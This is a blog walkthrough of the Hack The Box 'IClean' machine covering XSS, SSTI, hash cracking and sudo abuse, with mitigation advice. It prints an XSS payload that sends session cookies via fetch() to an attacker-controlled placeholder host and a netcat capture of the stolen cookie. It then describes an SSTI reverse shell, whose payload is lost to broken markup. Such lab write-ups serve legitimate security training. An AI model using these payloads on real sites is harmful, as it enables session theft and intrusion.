<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>IClean - XSS, SSTI, and Sudo abuse. | emdeh</title> <meta name="author" content=" "> <meta name="description" content="IClean - Hack The Box walkthrough."> <meta name="keywords" content="cybersecurity, ai, technology cyber"> <link rel="stylesheet" href="/assets/css/bootstrap.min.css?a4b3f509e79c54a512b890d73235ef04"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous"> <link defer rel="stylesheet" href="https://unpkg.com/bootstrap-table@1.22.1/dist/bootstrap-table.min.css"> <link rel="stylesheet" href="/assets/css/academicons.min.css?f0b7046b84e425c55f3463ac249818f5"> <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons"> <link rel="stylesheet" href="/assets/css/jekyll-pygments-themes-github.css?19f3075a2d19613090fe9e16b564e1fe" media="" id="highlight_theme_light"> <link href="/assets/css/bootstrap-toc.min.css?6f5af0bb9aab25d79b2448143cbeaa88" rel="stylesheet"> <link rel="shortcut icon" href="data:image/svg+xml,&lt;svg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20100%20100%22&gt;&lt;text%20y=%22.9em%22%20font-size=%2290%22&gt;%F0%9F%91%A8%E2%80%8D%F0%9F%92%BB&lt;/text&gt;&lt;/svg&gt;"> <link rel="stylesheet" href="/assets/css/main.css?d41d8cd98f00b204e9800998ecf8427e"> <link rel="canonical" href="https://emdeh.github.io/blog/2024/iclean-walkthrough/"> <link rel="stylesheet" href="/assets/css/jekyll-pygments-themes-native.css?e74e74bf055e5729d44a7d031a5ca6a5" media="none" id="highlight_theme_dark"> <script src="/assets/js/theme.js?96d6b3e1c3604aca8b6134c7afdd5db6"></script> <script src="/assets/js/dark_mode.js?9b17307bb950ffa2e34be0227f53558f"></script> <script async src="https://www.googletagmanager.com/gtag/js?id=G-JZNPNDMG9P"></script> <script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-JZNPNDMG9P");</script> </head> <body class="fixed-top-nav "> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="/">emdeh</a> <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse text-right" id="navbarNav"> <ul class="navbar-nav ml-auto flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/">about</a> </li> <li class="nav-item active"> <a class="nav-link" href="/blog/">blog<span class="sr-only">(current)</span></a> </li> <li class="nav-item "> <a class="nav-link" href="/repositories/">Repositories</a> </li> <li class="nav-item "> <a class="nav-link" href="/library/">Library</a> </li> <li class="nav-item dropdown "> <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">submenus</a> <div class="dropdown-menu dropdown-menu-right" aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/blog/category/htb-machines">HTB-Machines</a> <div class="dropdown-divider"></div> <a class="dropdown-item" href="/blog/category/essential-eight/">Essential Eight</a> <div class="dropdown-divider"></div> <a class="dropdown-item" href="/blog/category/artificial-intelligence/">Artificial Intelligence</a> <div class="dropdown-divider"></div> <a class="dropdown-item" href="/blog/category/explainers/">Explainers</a> </div> </li> <li class="toggle-container"> <button id="light-toggle" title="Change theme"> <i class="fas fa-moon"></i> <i class="fas fa-sun"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="container mt-5"> <div class="row"> <div class="col-sm-3"> <nav id="toc-sidebar" class="sticky-top"></nav> </div> <div class="col-sm-9"> <div class="post"> <header class="post-header"> <h1 class="post-title">IClean - XSS, SSTI, and Sudo abuse.</h1> <p class="post-meta">May 27, 2024</p> <p class="post-tags"> <a href="/blog/2024"> <i class="fas fa-calendar fa-sm"></i> 2024 </a>   ·   <a href="/blog/tag/medium-box"> <i class="fas fa-hashtag fa-sm"></i> medium-box</a>   <a href="/blog/tag/htb"> <i class="fas fa-hashtag fa-sm"></i> HTB</a>   <a href="/blog/tag/xss"> <i class="fas fa-hashtag fa-sm"></i> XSS</a>   <a href="/blog/tag/reflected-xss"> <i class="fas fa-hashtag fa-sm"></i> Reflected-XSS</a>   <a href="/blog/tag/cross-site-scripting"> <i class="fas fa-hashtag fa-sm"></i> Cross-Site-Scripting</a>   <a href="/blog/tag/ssti"> <i class="fas fa-hashtag fa-sm"></i> SSTI</a>   <a href="/blog/tag/server-side-template-injection"> <i class="fas fa-hashtag fa-sm"></i> Server-Side-Template-Injection</a>   <a href="/blog/tag/cookies"> <i class="fas fa-hashtag fa-sm"></i> cookies</a>   <a href="/blog/tag/cookie-manipulation"> <i class="fas fa-hashtag fa-sm"></i> cookie-manipulation</a>   <a href="/blog/tag/session-hijacking"> <i class="fas fa-hashtag fa-sm"></i> session-hijacking</a>   <a href="/blog/tag/command-injection"> <i class="fas fa-hashtag fa-sm"></i> command-injection</a>   <a href="/blog/tag/sudo-misconfiguration"> <i class="fas fa-hashtag fa-sm"></i> sudo-misconfiguration</a>   <a href="/blog/tag/secure-coding"> <i class="fas fa-hashtag fa-sm"></i> secure-coding</a>   <a href="/blog/tag/hardcoded-credentials"> <i class="fas fa-hashtag fa-sm"></i> hardcoded-credentials</a>   <a href="/blog/tag/cracking-hashes"> <i class="fas fa-hashtag fa-sm"></i> cracking-hashes</a>   <a href="/blog/tag/mysql"> <i class="fas fa-hashtag fa-sm"></i> mysql</a>     ·   <a href="/blog/category/htb-machines"> <i class="fas fa-tag fa-sm"></i> HTB-Machines</a>   </p> </header> <article class="post-content"> <div id="markdown-content"> <h1 id="introduction">Introduction</h1> <p>IClean is rated as a medium difficulty. It begins with enumerating a Flask web app and exploiting a XSS vulnerability to steal a session cookie. The cookie is used to bypass the <code class="language-plaintext highlighter-rouge">/login</code> page authentication and access a <code class="language-plaintext highlighter-rouge">/dashboard</code> page. An SSTI vulnerability is exploited on this page to establish remote code execution. Due to hardcoded credentials in a python script, hashes are dumped from a database. One hash is cracked, which enables lateral movement to a standard user’s account. The standard user has <code class="language-plaintext highlighter-rouge">sudo</code> rights over a binary, which is exploited to exfiltrate the <code class="language-plaintext highlighter-rouge">root</code> user’s <code class="language-plaintext highlighter-rouge">/id_rsa</code> file to achieve privilege escalation.</p> <h2 id="vulnerabilities-explored">Vulnerabilities explored</h2> <h3 id="cross-site-scripting-scripting">Cross-Site Scripting scripting</h3> <p>As discussed in <a href="https://emdeh.com/blog/2024/headleass-walkthrough/#vulnerabilities-explored" rel="external nofollow noopener" target="_blank">Headless walkthrough</a>, Cross-Site Scripting (XSS) is a type of vulnerability that allows a threat actor to inject a malicious payload into content that other users will view. When the content is viewed, the malicious payload will be executed, which can lead to data theft, session hijacking, and other types of breaches. See the linked article for a deeper explanation on XSS vulnerabilities.</p> <h3 id="session-hijacking">Session hijacking</h3> <p>Also discussed in the <a href="https://emdeh.com/blog/2024/headleass-walkthrough/#vulnerabilities-explored" rel="external nofollow noopener" target="_blank">Headless walkthrough</a>, session hijacking involves exploiting a session by stealing or predicting a valid token. The token can then be used to bypass authentication mechanisms and/or steal data.</p> <h4 id="mitigation">Mitigation</h4> <p>Some additional mitigation to what was discussed in the <a href="https://emdeh.com/blog/2024/headleass-walkthrough/#vulnerabilities-explored" rel="external nofollow noopener" target="_blank">Headless walkthrough</a> article include:</p> <ul> <li> <strong>Use HTTPS</strong>: Ensure all communication between the client and server is encrypted using HTTPS to prevent session hijacking via network sniffing.</li> <li> <strong>User-Agent and IP Binding</strong>: Bind the session to the user’s IP address and User-Agent string to make session hijacking more difficult.</li> </ul> <h3 id="server-side-template-injection">Server-Side Template Injection</h3> <p>Server-Side Template Injection (SSTI) occurs when a a threat actor exploits a web application’s template rendering system by injecting malicious code into the templates. This happens when the template engine fails to properly distinguish between the template code and user-provided data meant to populate the placeholders. As a result, the injected code is processed as part of the template, leading to the execution of malicious payloads.</p> <h4 id="mitigation-1">Mitigation</h4> <p>To avoid SSTI vulnerabilities the following can be considered:</p> <ul> <li> <strong>Input Validation</strong>: Validate and sanitise all user inputs to ensure they do not contain executable code.</li> <li> <strong>Use Secure Templates</strong>: Choose template engines that offer built-in security features and avoid using insecure or outdated ones.</li> <li> <strong>Escape User Inputs</strong>: Always escape user inputs before including them in templates to prevent execution as code.</li> <li> <strong>Whitelist Inputs</strong>: Use a whitelist approach to limit the types of data that can be included in templates.</li> <li> <strong>Limit Template Functionality</strong>: Restrict the capabilities of the template engine to minimise the risk of code execution.</li> <li> <strong>Separate Data and Code</strong>: Ensure a clear separation between the template logic and user data to prevent mixing executable code with user inputs.</li> <li> <strong>Security Audits</strong>: Regularly perform security audits and code reviews to identify and fix potential SSTI vulnerabilities.</li> <li> <strong>Keep Dependencies Updated</strong>: Regularly update the template engine and other dependencies to the latest versions with security patches.</li> </ul> <h3 id="insecure-coding---hardcoded-credentials">Insecure coding - hardcoded credentials</h3> <p>Similarly to <a href="https://emdeh.com/blog/2024/headleass-walkthrough/#vulnerabilities-explored" rel="external nofollow noopener" target="_blank">Headless</a>, insecure coding practices can lead to significant attack vectors. In this case, credentials for a database were hardcoded, which enabled lateral movement.</p> <h4 id="mitigation-2">Mitigation</h4> <ul> <li> <strong>Environment variables:</strong> Store credentials in environment variables rather than in the source code.</li> </ul> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">os</span>
<span class="n">db_password</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">DB_PASSWORD</span><span class="sh">'</span><span class="p">)</span>
</code></pre></div></div> <ul> <li> <strong>Configuration files:</strong> Use configuration files that are not included in version control to store credentials and sensitive information, ensuring these files are secured with appropriate permissions.</li> </ul> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"db_password"</span><span class="p">:</span><span class="w"> </span><span class="s2">"your_password"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div> <ul> <li> <strong>Secrets Management Tools</strong>: Use dedicated secrets management tools like AWS Secrets Manager or Azure Key Vault.</li> <li> <strong>Secrets Rotation</strong>: Regularly rotate secrets and credentials to reduce the risk of compromised credentials.</li> <li> <strong>Secure Code Reviews</strong>: Conduct regular code reviews with a focus on security to identify and remediate hardcoded credentials and other insecure coding practices. <h3 id="sudo-misconfiguration">Sudo misconfiguration</h3> <p>As discussed in <a href="https://emdeh.com/blog/2024/headleass-walkthrough/#vulnerabilities-explored" rel="external nofollow noopener" target="_blank">Headless</a>, the <code class="language-plaintext highlighter-rouge">sudoers</code> file controls which users can execute commands with elevated privileges. If this file is configured to allow a user to run certain commands as the superuser.</p> </li> </ul> <p>Some binaries, when executed with elevated privileges, can be used to perform tasks that compromise the security of the system. For instance, if a binary allows file manipulation, a threat actor can use it to gain higher privileges or conduct further exfiltration of sensitive data.</p> <h2 id="tools">Tools</h2> <ul> <li>Nmap</li> <li>Gobuster</li> <li>Burpsuite</li> <li>Hashcat</li> </ul> <h2 id="tactics-and-methods">Tactics and Methods</h2> <h3 id="enumerating-webpages">Enumerating webpages</h3> <ul> <li>Gobuster was used to enumerate pages of the site, which identified the target page <code class="language-plaintext highlighter-rouge">/dashboard</code>.</li> </ul> <h3 id="stealing-cookies-by-exploiting-a-reflected-xss-vulnerability">Stealing cookies by exploiting a Reflected XSS vulnerability</h3> <ul> <li>Burpsuite was used to observer the HTTP requests while using the target site, ultimately leading to the identification of a XSS vulnerability and the exfiltration of a session cookie.</li> </ul> <h3 id="authentication-bypass-via-session-hijacking">Authentication bypass via session hijacking</h3> <ul> <li>Authentication to the target page <code class="language-plaintext highlighter-rouge">/dashboard</code> was achieved by using the stolen cookie to hijack a session.</li> </ul> <h3 id="remote-code-execution-by-exploiting-a-ssti-vulnerability">Remote code execution by exploiting a SSTI vulnerability</h3> <ul> <li>The SSTI vulnerability in the <code class="language-plaintext highlighter-rouge">/QRGenerator</code> was exploited to achieve remote code execution and establish a reverse shell within the context of the <code class="language-plaintext highlighter-rouge">www-data</code> user.</li> </ul> <h3 id="brute-forcing-hashed-passwords">Brute-forcing hashed passwords</h3> <ul> <li>Hashcat was used to crack the hashes stolen from the <code class="language-plaintext highlighter-rouge">users</code> database and compromise a standard user’s account.</li> </ul> <h3 id="abusing-sudo-to-exfiltrate-sensitive-data-and-achieve-privilige-escalation">Abusing <code class="language-plaintext highlighter-rouge">sudo</code> to exfiltrate sensitive data and achieve privilige escalation</h3> <ul> <li>Privilege escalation was achieved by stealing the <code class="language-plaintext highlighter-rouge">root</code> user’s <code class="language-plaintext highlighter-rouge">id_rsa</code> file by exploiting a vulnerability in the <code class="language-plaintext highlighter-rouge">qpdf</code> binary that the compromised user had <code class="language-plaintext highlighter-rouge">sudo</code> rights over.</li> </ul> <hr> <h1 id="enumeration">Enumeration</h1> <h2 id="nmap-scanning">Nmap scanning</h2> <p>As always, the target is scanned with Nmap.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/scans]
└─<span class="nv">$ </span>nmap <span class="nt">-A</span> 10.129.10.21 | <span class="nb">tee </span>nmap-output.txt
</code></pre></div></div> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-05-24 01:21 EDT
Nmap scan report <span class="k">for </span>10.129.10.21
Host is up <span class="o">(</span>0.32s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   256 2c:f9:07:77:e3:f1:3a:36:db:f2:3b:94:e3:b7:cf:b2 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 4a:91:9f:f2:74:c0:41:81:52:4d:f1:ff:2d:01:78:6b <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.52 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-title: Site doesn<span class="s1">'t have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds
</span></code></pre></div></div> <h3 id="findings">Findings</h3> <ol> <li>Port 22</li> <li>Port 80</li> </ol> <h2 id="port-80-enumeration">Port 80 Enumeration</h2> <p>Navigating to the site results in Server Not Found but reveals the domain: <code class="language-plaintext highlighter-rouge">http://capiclean.htb/</code>.</p> <p>Adding to <code class="language-plaintext highlighter-rouge">/etc/hosts/</code> file resolves the target to a landing page:</p> <p><img src="/assets/img/2024/iclean/icleanmimetypes.png" alt="icleanmimetypes.png" class="auto-resize"></p> <p>There is a login page at <code class="language-plaintext highlighter-rouge">capiclean.htb/login</code>, and a page to submit a quotes at <code class="language-plaintext highlighter-rouge">capiclean.htb/quote</code>.</p> <h2 id="further-page-enumeration">Further page enumeration</h2> <p>Further enumeration was conducted with Gobuster:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/scans]
└─<span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://capiclean.htb <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-1.0.txt <span class="nt">-t</span> 100 <span class="nt">-x</span> php,html <span class="nt">-o</span> gobuster-scan.txt
</code></pre></div></div> <p>This command uses Gobuster to brute-force directories (pages) on the site.</p> <ul> <li> <strong><code class="language-plaintext highlighter-rouge">gobuster dir</code></strong>: This tells Gobuster to use its directory and file brute-forcing mode.</li> <li> <code class="language-plaintext highlighter-rouge">**-u http://capiclean.htb**</code>: Specifies the target URL to be scanned,</li> <li> <code class="language-plaintext highlighter-rouge">**-w /usr/share/wordlists/dirbuster/directory-list-1.0.txt**:</code> Specifies the path to the wordlist that Gobuster will use for brute-forcing.</li> <li> <code class="language-plaintext highlighter-rouge">**-t 100**</code>: Sets the number of concurrent threads to use for the scan. In this case, Gobuster will use 100 threads to speed up the process.</li> <li> <code class="language-plaintext highlighter-rouge">**-x php,html**</code>: Specifies the file extensions to append to each word in the wordlist. Gobuster will check for both <code class="language-plaintext highlighter-rouge">.php</code> and <code class="language-plaintext highlighter-rouge">.html</code> extensions.</li> <li> <code class="language-plaintext highlighter-rouge">**-o gobuster-scan.txt**</code>: Specifies the output file where the results will be saved. The results of this scan will be written to <code class="language-plaintext highlighter-rouge">gobuster-scan.txt</code>.</li> </ul> <p>Early results reveal a <code class="language-plaintext highlighter-rouge">/dashboard</code> page with a status code of 302, suggesting it was found but redirected to the root of the site; presumably because it is behind the <code class="language-plaintext highlighter-rouge">/login</code> page. This is likely the target page.</p> <p><img src="/assets/img/2024/iclean/icleanlandingpage.png" alt="icleanlandingpage.png" class="auto-resize"></p> <h2 id="quote-page-enumeration">Quote page enumeration</h2> <p>Observing the POST request for the <code class="language-plaintext highlighter-rouge">/quote</code> page in Burpsuite reveals the server will accept image types. This may lead to the possibility of exfiltrating cookies via XSS.</p> <p><img src="/assets/img/2024/iclean/iclean302dashboard.png" alt="iclean302dashboard.png" class="auto-resize"></p> <h1 id="initial-access">Initial access</h1> <h2 id="xss-to-exfiltrate-cookies">XSS to exfiltrate cookies</h2> <p>Given there was a login page, it may be possible to perform an XSS attack to extract session cookies and impersonate a user by appending the following to the URL parameter in the POST request:</p> <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>service=<span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">fetch("http://IP:4444/"+document.cookie);</span><span class="nt">&gt;</span>
</code></pre></div></div> <p>This attempts to exfiltrate cookies to a remote server.</p> <ul> <li> <code class="language-plaintext highlighter-rouge">&amp;service=</code>: This part of the string is the URL parameter named <code class="language-plaintext highlighter-rouge">service</code>.</li> <li> <code class="language-plaintext highlighter-rouge">&lt;img src=x onerror=...&gt;</code>: This is an HTML <code class="language-plaintext highlighter-rouge">img</code> tag. Normally, the <code class="language-plaintext highlighter-rouge">src</code> attribute specifies the path to the image. However, in this case, an <code class="language-plaintext highlighter-rouge">x</code> is used to trigger an error event.</li> <li> <code class="language-plaintext highlighter-rouge">onerror=...</code>: The <code class="language-plaintext highlighter-rouge">onerror</code> attribute is an event handler that executes JavaScript code when an error occurs while loading the image (because <code class="language-plaintext highlighter-rouge">src=x</code> will fail).</li> <li> <code class="language-plaintext highlighter-rouge">fetch("http://RemoteIP:4444/"+document.cookie);</code>: This JavaScript code is executed when the image fails to load. It uses the <code class="language-plaintext highlighter-rouge">fetch</code> function to make an HTTP request to the attacker’s server (<code class="language-plaintext highlighter-rouge">http://ATTACK_IP:4444/</code>). The <code class="language-plaintext highlighter-rouge">+document.cookie</code> part appends the document’s cookies to the URL, effectively sending them to the attacker’s server.</li> </ul> <p>Repeating the POST request after adding the payload, and URL-encoding it, looks like this:</p> <p><img src="/assets/img/2024/iclean/icleanXSSpayload.png" alt="icleanXSSpayload.png" class="auto-resize"></p> <p>Starting a listener captures the cookie as expected:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/credentials]
└─<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 4444
listening on <span class="o">[</span>any] 4444 ...
connect to <span class="o">[</span>10.10.14.6] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.129.10.21] 56354
GET /session<span class="o">=</span>eyJyb2xlIjoiMj&lt;SNIP&gt;.0qvcHllPTlaUvubvwVzl77I1glM HTTP/1.1
Host: 10.10.14.6:4444
Connection: keep-alive
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="o">)</span> AppleWebKit/537.36 <span class="o">(</span>KHTML, like Gecko<span class="o">)</span> Chrome/116.0.0.0 Safari/537.36
Accept: <span class="k">*</span>/<span class="k">*</span>
Origin: http://127.0.0.1:3000
Referer: http://127.0.0.1:3000/
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9
</code></pre></div></div> <h2 id="session-hijacking-with-stolen-cookie">Session hijacking with stolen cookie</h2> <p>The cookie can be used to impersonate a session. By inspecting the login page, the cookie can be added to storage. Then, attempting to browse to the <code class="language-plaintext highlighter-rouge">/dashboard</code> page, which would typically sit behind the login page, can be done by simply changing the URL.</p> <p><img src="/assets/img/2024/iclean/icleansessionhijack.png" alt="icleansessionhijack.png" class="auto-resize"></p> <p>As the session will use the stolen cookie, the page loads as expected.</p> <p><img src="/assets/img/2024/iclean/icleandashboardpage.png" alt="icleandashboardpage.png" class="auto-resize"></p> <h2 id="dashboard-enumeration">Dashboard enumeration</h2> <p>Generating an invoice, then using the invoice number to generate a QR creates a link that can then be submitted to return a scannable invoice.</p> <p><img src="/assets/img/2024/iclean/icleaninvoice.png" alt="icleaninvoice.png" class="auto-resize"></p> <p>Observing the resulting POST request in Burpsuite suggests this may be the vector to obtain a reverse shell through a Server-Side Template Injection (SSTI).</p> <h2 id="server-side-template-injection-for-a-reverse-shell">Server-Side Template Injection for a reverse shell</h2> <h3 id="identifying-the-template-engine">Identifying the Template engine</h3> <p>The HTTP headers reveal the server is using the <code class="language-plaintext highlighter-rouge">Werkzeug/2.3.7</code> utility library for Python, which is common for Flask applications. Flask typically defaults to using <code class="language-plaintext highlighter-rouge">Jinja2</code> for templating.</p> <ul> <li> <strong>Werkzeug</strong>: Provides the underlying Web Server Gateway Interface (WSGI) functionality and utilities for Flask.</li> <li> <strong>Flask</strong>: A web framework that uses Werkzeug and often Jinja2 for templating.</li> <li> <strong>Jinja2</strong>: The default template engine used by Flask for rendering HTML templates. <h3 id="testing">Testing</h3> </li> </ul> <p>Using simple payloads can confirm if SSTI is possible. e.g., ``.</p> <p>The diagram below from <a href="https://portswigger.net/research/server-side-template-injection" rel="external nofollow noopener" target="_blank">PortsSwigger</a> can help confirm if an SSTI vulnerability is present and also identify the underlying template engine.</p> <p><img src="/assets/img/2024/iclean/portswiggerssti.png" alt="portswiggerssti.png" class="auto-resize"></p> <h3 id="construct-the-malicious-payload"><strong>Construct the Malicious Payload</strong></h3> <p>Assuming Jinja2, and with the help of <a href="https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/" rel="external nofollow noopener" target="_blank">A Simple Flask (Jinja2) Server-Side Template Injection (SSTI) Example (kleiber.me)</a> the following payload was constructed:</p> <pre><code class="language-```">
URL-encoding and inputting the payload into the vulnerable parameter and sending the request results in a shell.

&lt;img src="/assets/img/2024/iclean/icleanqrgenhttp.png" alt="icleanqrgenhttp.png" class="auto-resize"&gt;


&lt;img src="/assets/img/2024/iclean/icleannclistener.png" alt="icleannclistener.png" class="auto-resize"&gt;

### Stabilising the shell

The shell can be stabilised with the following python command.

```python
python -c 'import pty; pty.spawn("/bin/bash")'
</code></pre> <h1 id="lateral-movement">Lateral movement</h1> <h2 id="stealing-hashes">Stealing hashes</h2> <p>In the present working directory, there is an <code class="language-plaintext highlighter-rouge">app.py</code> script. Within it are hardcoded credentials for a database.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Database Configuration
db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': '&lt;SNIP&gt;',
    'database': 'capiclean'
</code></pre></div></div> <p>At the start of the script there is a import for <code class="language-plaintext highlighter-rouge">pymysql</code>, confirming the type of database to be MySQL.</p> <p>As the Database is running locally, it can be connected to by passing the <code class="language-plaintext highlighter-rouge">username</code> and inputting the <code class="language-plaintext highlighter-rouge">password</code> when prompted:</p> <p><img src="/assets/img/2024/iclean/icleanmysqlauth.png" alt="icleanmysqlauth.png" class="auto-resize"></p> <p>Listing the databases finds one named <code class="language-plaintext highlighter-rouge">capiclean</code>.</p> <pre><code class="language-mysql">mysql&gt; SHOW DATABASES;
SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| capiclean          |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)
</code></pre> <p>Switching to <code class="language-plaintext highlighter-rouge">capiclean</code> and listing tables reveals a table of <code class="language-plaintext highlighter-rouge">users</code>.</p> <pre><code class="language-mysql">mysql&gt; USE capiclean;
USE capiclean;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql&gt; show tables;
show tables;
+---------------------+
| Tables_in_capiclean |
+---------------------+
| quote_requests      |
| services            |
| users               |
+---------------------+
3 rows in set (0.00 sec)
</code></pre> <h3 id="dumping-database-table">Dumping database table</h3> <p>Selecting all rows from the <code class="language-plaintext highlighter-rouge">users</code> table reveals two rows with hashed passwords.</p> <p><img src="/assets/img/2024/iclean/icleandbhashes.png" alt="icleandbhashes.png" class="auto-resize"></p> <h2 id="cracking-the-hash">Cracking the hash</h2> <p>The hash is most likely a <code class="language-plaintext highlighter-rouge">SHA-256</code>.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The following 8 hash-modes match the structure of your input <span class="nb">hash</span>:

      <span class="c"># | Name                                                       | Category</span>
  <span class="o">======</span>+<span class="o">============================================================</span>+<span class="o">======================================</span>
   1400 | SHA2-256                                                   | Raw Hash
  17400 | SHA3-256                                                   | Raw Hash
  11700 | GOST R 34.11-2012 <span class="o">(</span>Streebog<span class="o">)</span> 256-bit, big-endian           | Raw Hash
   6900 | GOST R 34.11-94                                            | Raw Hash
  17800 | Keccak-256                                                 | Raw Hash
   1470 | sha256<span class="o">(</span>utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span>                                     | Raw Hash
  20800 | sha256<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span>                                         | Raw Hash salted and/or iterated
  21400 | sha256<span class="o">(</span>sha256_bin<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span>                                  | Raw Hash salted and/or iterated

Please specify the hash-mode with <span class="nt">-m</span> <span class="o">[</span>hash-mode].

Started: Sun May 26 20:00:37 2024
Stopped: Sun May 26 20:00:39 2024
</code></pre></div></div> <p>Using Hashcat with <code class="language-plaintext highlighter-rouge">-m 1400</code> cracks it.</p> <p><img src="/assets/img/2024/iclean/icleancrackedhash.png" alt="icleancrackedhash.png" class="auto-resize"></p> <h2 id="logging-in-via-ssh">Logging in via SSH</h2> <p>The stolen password can now be used to login via SSH, and the first flag is found.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>──<span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/credentials]
└─<span class="nv">$ </span>ssh consuela@capiclean.htb
The authenticity of host <span class="s1">'capiclean.htb (10.129.11.43)'</span> can<span class="s1">'t be established.
ED25519 key fingerprint is SHA256:3nZua2j9n72tMAHW1xkEyDq3bjYNNSBIszK1nbQMZfs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>capiclean.htb<span class="s1">' (ED25519) to the list of known hosts.
consuela@capiclean.htb'</span>s password:
&lt;SNIP&gt;
consuela@iclean:~<span class="nv">$ </span><span class="nb">pwd</span>
/home/consuela
consuela@iclean:~<span class="nv">$ </span><span class="nb">ls
</span>user.txt
consuela@iclean:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
&lt;SNIP&gt;
</code></pre></div></div> <h1 id="privilege-escalation">Privilege escalation</h1> <h2 id="abusing-sudo">Abusing sudo</h2> <p>Checking <code class="language-plaintext highlighter-rouge">sudo</code> rights, reveals a binary that the <code class="language-plaintext highlighter-rouge">consuela</code> user can run.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>consuela@iclean:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>consuela:
Matching Defaults entries <span class="k">for </span>consuela on iclean:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty

User consuela may run the following commands on iclean:
    <span class="o">(</span>ALL<span class="o">)</span> /usr/bin/qpdf
